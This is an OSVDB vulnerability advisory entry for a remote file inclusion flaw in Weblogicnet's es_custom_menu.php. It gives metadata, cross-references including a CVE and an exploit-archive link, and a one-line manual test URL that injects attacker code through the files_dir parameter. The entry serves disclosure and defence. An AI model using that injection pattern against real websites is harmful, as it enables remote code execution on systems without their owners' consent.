Weblogicnet es_custom_menu.php files_dir Variable Remote File Inclusion

2007-09-02T00:00:00
ID OSVDB:38424
Type osvdb
Reporter OSVDB
Modified 2007-09-02T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/es_custom_menu.php?files_dir=[evilCode]

References:

Related OSVDB ID: 38423 Related OSVDB ID: 38425 Other Advisory URL: http://www.solpotcrew.org/adv/home_edition2001-adv-02.txt ISS X-Force ID: 36409 Generic Exploit URL: http://www.milw0rm.com/exploits/4352 FrSIRT Advisory: ADV-2007-3089 CVE-2007-4715 Bugtraq ID: 25506